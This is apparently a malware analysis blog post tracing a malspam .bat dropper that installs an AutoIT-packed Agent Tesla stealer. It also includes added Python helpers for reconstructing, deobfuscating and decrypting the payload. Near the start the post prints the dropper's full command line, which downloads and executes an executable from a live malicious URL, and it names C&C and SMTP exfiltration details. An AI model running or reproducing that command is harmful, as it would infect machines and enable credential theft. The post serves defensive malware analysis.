On the 29th of February 2020, thanks to our Malware Intelligence Platform, we found a new and unusual malspam campaign targeting the sales office of a large company. The email was the following:
The attachment of this malspam email wasn't the usual Microsoft Office dropper with macros, but a simple .bat dropper that did nothing but download and run the real AutoIT malware from this domain: hxxp://www.bitsandbytes.net.in/bobbbb.exe. Its whole content is this single command line:
cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%TEMP%poc.vbs&@echo objXMLHTTP.open "GET","http://www.bitsandbytes.net.in/bobbbb.exe",false>>%TEMP%poc.vbs&@echo objXMLHTTP.send()>>%TEMP%poc.vbs&@echo If objXMLHTTP.Status=200 Then>>%TEMP%poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>%TEMP%poc.vbs&@echo objADOStream.Open>>%TEMP%poc.vbs&@echo objADOStream.Type=1 >>%TEMP%poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>%TEMP%poc.vbs&@echo objADOStream.Position=0 >>%TEMP%poc.vbs&@echo objADOStream.SaveToFile "%TEMP%\LDTVF.exe">>%TEMP%poc.vbs&@echo objADOStream.Close>>%TEMP%poc.vbs&@echo Set objADOStream=Nothing>>%TEMP%poc.vbs&@echo End if>>%TEMP%poc.vbs&@echo Set objXMLHTTP=Nothing>>%TEMP%poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>%TEMP%poc.vbs&@echo objShell.Exec("%TEMP%\LDTVF.exe")>>%TEMP%poc.vbs&cscript.exe %TEMP%poc.vbs"
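The command chains `@echo ... >file` (create or overwrite) and `@echo ... >>file` (append) to write poc.vbs one line at a time, then runs it with cscript.exe. The following script, an added example and not code from the original post, replays that echo chain offline to reconstruct the dropped VBScript and pull out the download URL and the dropped and executed paths. The command string is the one shown above; the helper names are mine.

```python
import re

# The dropper's command line as printed on the page (straight quotes and
# ">>" restored from the curly quotes and "»" of the extracted text).
BAT_CMD = (
    'cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%TEMP%poc.vbs'
    '&@echo objXMLHTTP.open "GET","http://www.bitsandbytes.net.in/bobbbb.exe",false>>%TEMP%poc.vbs'
    '&@echo objXMLHTTP.send()>>%TEMP%poc.vbs'
    '&@echo If objXMLHTTP.Status=200 Then>>%TEMP%poc.vbs'
    '&@echo Set objADOStream=CreateObject("ADODB.Stream")>>%TEMP%poc.vbs'
    '&@echo objADOStream.Open>>%TEMP%poc.vbs'
    '&@echo objADOStream.Type=1 >>%TEMP%poc.vbs'
    '&@echo objADOStream.Write objXMLHTTP.ResponseBody>>%TEMP%poc.vbs'
    '&@echo objADOStream.Position=0 >>%TEMP%poc.vbs'
    r'&@echo objADOStream.SaveToFile "%TEMP%\LDTVF.exe">>%TEMP%poc.vbs'
    '&@echo objADOStream.Close>>%TEMP%poc.vbs'
    '&@echo Set objADOStream=Nothing>>%TEMP%poc.vbs'
    '&@echo End if>>%TEMP%poc.vbs'
    '&@echo Set objXMLHTTP=Nothing>>%TEMP%poc.vbs'
    '&@echo Set objShell=CreateObject("WScript.Shell")>>%TEMP%poc.vbs'
    r'&@echo objShell.Exec("%TEMP%\LDTVF.exe")>>%TEMP%poc.vbs'
    '&cscript.exe %TEMP%poc.vbs"'
)

# "@echo <text> > file" or "@echo <text> >> file"; a single ">" truncates the file.
ECHO_RE = re.compile(r'^@echo (?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<target>[^\s&]+)$')


def strip_cmd_wrapper(cmd):
    """Return the body of `cmd.exe /c "..."`, or the input unchanged."""
    m = re.match(r'^\s*cmd(?:\.exe)?\s+/c\s+"(.*)"\s*$', cmd, re.I | re.S)
    return m.group(1) if m else cmd


def split_commands(body):
    """Split on '&' outside double quotes (cmd treats a quoted '&' literally)."""
    parts, cur, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            parts.append(''.join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur))
    return [p.strip() for p in parts if p.strip()]


def reconstruct_dropped_files(cmd):
    """Replay the echo/redirect chain: returns ({path: [lines]}, [other commands])."""
    files, others = {}, []
    for part in split_commands(strip_cmd_wrapper(cmd)):
        m = ECHO_RE.match(part)
        if not m:
            others.append(part)          # e.g. the final cscript.exe invocation
            continue
        lines = files.setdefault(m['target'], [])
        if m['op'] == '>':
            lines.clear()                # ">" overwrites whatever was written before
        lines.append(m['text'].rstrip())  # echo keeps the trailing space; drop it for readability
    return files, others


def extract_iocs(lines):
    """Pull URLs, SaveToFile targets and Exec targets out of reconstructed VBScript."""
    urls, dropped, executed = set(), set(), set()
    for line in lines:
        urls.update(re.findall(r'https?://[^\s"\']+', line))
        m = re.search(r'SaveToFile\s+"([^"]+)"', line)
        if m:
            dropped.add(m.group(1))
        m = re.search(r'\.Exec\(\s*"([^"]+)"\s*\)', line)
        if m:
            executed.add(m.group(1))
    return {"urls": sorted(urls), "dropped": sorted(dropped), "executed": sorted(executed)}


if __name__ == "__main__":
    files, others = reconstruct_dropped_files(BAT_CMD)
    for path, lines in files.items():
        print(f"--- {path} ({len(lines)} lines)")
        print("\n".join(lines))
    print("--- then runs:", others)
    print(extract_iocs(files['%TEMP%poc.vbs']))
```

Replaying the chain rather than eyeballing it matters when the dropper interleaves several target files or overwrites one with a lone `>` halfway through: the reconstructed file is what cscript.exe actually runs, not the sequence of echoes.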
The downloaded bobbbb.exe is an AutoIT executable that contains an Agent Tesla payload.
AutoIT is a scripting language for Windows that is widely used to build malware because of its high-level abstraction and low rate of antivirus detection. Fortunately, its compilation process is easy to invert with tools like Exe2Aut, which return an almost perfect AutoIT source. However, the recovered code is very often heavily obfuscated and therefore hard to understand.
As you can see in Figure 3, all strings are encrypted with one or more layers of obfuscation. Fortunately all those decryption functions return a string, and since we have the source code, I modified those functions directly in the script to write the result of each decryption to a file. After that, a simple Python script substituted the decrypted strings back into the source to obtain something more readable.
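One way to do that substitution step, as an added example and not the author's actual script: the AutoIt decryption function is assumed to have been patched to log one `input|key|result` line per call. The function name rskd, the sample source and the log lines are all constructed for illustration and are not taken from the dropper. Nested calls (several layers of obfuscation) are resolved by repeating the substitution until nothing changes; calls that have no log entry are left in place so they stay visible.

```python
import re

# Hypothetical name(s) of the AutoIt string-decryption function; the real
# dropper uses obfuscated names, so pass the names found in the Exe2Aut output.
DECRYPT_FUNCS = ("rskd",)

# Constructed sample of the decompiled source (not the real dropper's code).
OBFUSCATED_SOURCE = '''\
$sUrl = rskd("7gq5H", 3)
$hLib = DllOpen(rskd("aaa", 1))
$pAlloc = DllCall($hLib, "ptr", rskd(rskd("zzz", 2), 5), "ptr", 0, "ulong_ptr", 4096)
$sUnknown = rskd("qqq", 9)
'''

# Constructed log, in the format the instrumented function would write, e.g.
#   FileWriteLine($hLog, $sInput & "|" & $iKey & "|" & $sResult)
# One line per call actually executed, so a nested call produces two entries.
DECRYPT_LOG = '''\
7gq5H|3|http://www.bitsandbytes.net.in/bobbbb.exe
aaa|1|kernel32.dll
zzz|2|Virtual
Virtual|5|VirtualAlloc
'''


def parse_log(log_text):
    """Map (input, key) -> decrypted string. The result field may itself contain '|'."""
    table = {}
    for line in log_text.splitlines():
        if not line:
            continue
        inp, key, result = line.split("|", 2)
        table[(inp, int(key))] = result
    return table


def autoit_literal(s):
    """AutoIt string literal: a double quote inside the string is written as two."""
    return '"' + s.replace('"', '""') + '"'


def deobfuscate(source, table, func_names=DECRYPT_FUNCS, max_rounds=10):
    """Replace decrypt("<literal>", <int>) calls with their logged results.

    Only calls whose first argument is already a string literal match, so the
    innermost call of a nested chain is replaced first; repeating until the
    text stops changing resolves the outer layers. Calls with no log entry
    are returned unchanged.
    """
    names = "|".join(re.escape(n) for n in func_names)
    call_re = re.compile(r'(?:%s)\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*\)' % names)

    def replace(m):
        inp = m.group(1).replace('""', '"')
        hit = table.get((inp, int(m.group(2))))
        return autoit_literal(hit) if hit is not None else m.group(0)

    for _ in range(max_rounds):
        new_source, n = call_re.subn(replace, source)
        if n == 0 or new_source == source:
            break
        source = new_source
    return source


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED_SOURCE, parse_log(DECRYPT_LOG)))
```

Logging the (input, key) pair rather than only the result is what makes the mapping unambiguous: the same function is called hundreds of times and two different inputs can decrypt to the same string.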
In Figure 2 you can see the main function of this executable:
The $payload variable contains the encrypted Agent Tesla payload as a reversed string (the reversed "0x" prefix shows up as "x0" at its end). This payload is decrypted and injected into the RegAsm.exe process.
Next I will explain the details of this process.
To extract the Agent Tesla payload, we have to analyze in detail what the program does with the $payload variable. In Figures 3-4 you can see the AllocatePayload() function before and after deobfuscation:
In this function we can see another shellcode, which I called $rc4decryptor. Indeed, it's clear what the dropper does: it RC4-decrypts the payload with that stub. Since we can edit the source, the simplest way to extract the decrypted payload is to add a FileWrite() call right after the decryption:
FileWrite("decrypted_payload.bin", $decrypted_payload)
Otherwise we can put a breakpoint at the end of the RC4 decryption stub and dump the decrypted memory (but then you need to rebuild the corrupted PE header).
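To make the transformation concrete, the following added example (not code from the post) undoes the string reversal, decodes the hex text, RC4-decrypts it and checks that the result carries a valid PE header before writing it out, which is the same sanity check you want after a memory dump. It assumes the reversed string is the AutoIt-style `0x...` hex form of the RC4 ciphertext; the key, the fake PE bytes and all names are constructed for illustration, and the real dropper's key has to be read from its deobfuscated source.

```python
import struct


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unreverse_payload(reversed_hex):
    """Undo the string reversal and decode the '0x...' hex text to bytes."""
    text = reversed_hex[::-1]
    if not text.startswith("0x"):
        raise ValueError("expected the reversed string to start with '0x'")
    return bytes.fromhex(text[2:])


def decrypt_payload(reversed_hex, key):
    return rc4(key, unreverse_payload(reversed_hex))


def looks_like_pe(data):
    """Sanity check for a decrypted/dumped image: MZ magic and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed stand-in for the encrypted $payload: a minimal fake PE header,
# RC4-encrypted under a made-up key, hex-encoded with a "0x" prefix and reversed.
FAKE_KEY = b"not-the-real-key"
FAKE_PE = (b"MZ\x90\x00" + b"\x00" * 0x38          # DOS header up to e_lfanew
           + struct.pack("<I", 0x40)               # e_lfanew -> offset 0x40
           + b"PE\x00\x00" + b"\x00" * 20)         # PE signature
FAKE_PAYLOAD = ("0x" + rc4(FAKE_KEY, FAKE_PE).hex().upper())[::-1]

if __name__ == "__main__":
    print("payload ends with:", FAKE_PAYLOAD[-2:])   # 'x0', as in the dropper
    pe = decrypt_payload(FAKE_PAYLOAD, FAKE_KEY)
    print("valid PE header:", looks_like_pe(pe))
    with open("decrypted_payload.bin", "wb") as f:
        f.write(pe)
```

If looks_like_pe() fails on a memory dump taken after the decryption stub, the header was overwritten by the loader or the injector, which is exactly the "rebuild the PE header" caveat above; the FileWrite() route avoids that because it captures the buffer before anything maps it.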
The InjectToProcess() function (Figure 5) allocates memory for another strange shellcode, built again by concatenating strings, and then calls that shellcode with RegAsm.exe and the decrypted Agent Tesla payload as parameters. That shellcode simply injects the payload into the process.
Agent Tesla is a .NET based malware that steals passwords, keystrokes and other sensitive information and sends it to a remote C&C server over HTTP or SMTP. I will not go deep into this analysis, because many articles have already covered this family. Through dynamic analysis we can easily see that it tries to access all the browser files that store passwords (Figure 6), and opens a TCP connection to this AWS C&C:
ec2-54-204-24-179.compute-1.amazonaws[.]com
Analyzing the extracted payload with dnSpy, we find more obfuscated code. What we want to retrieve are the SMTP credentials, which are hardcoded in the extracted payload (figure below). All strings are decrypted by the Module.\u205f() function.
In this function (last figure) the parameter A_0 is an integer that identifies the string to decrypt. It is used only at line 18055, so I put a breakpoint at line 18056 and manually modified the value of the num3 variable in memory, setting it to the indexes corresponding to the SMTP credentials (I had to do it this way because, during debugging, I could not reach the SMTP stub):
Username index: 602112 -> 0x00093000 -> contact@euramtec.pw
Password index: 602240 -> 0x00093080 -> ***
SMTP host index: 602368 -> 0x00093100 -> us2.smtp.mailhostbox.com
This is how the emails with the stolen data arrive at the malware operator: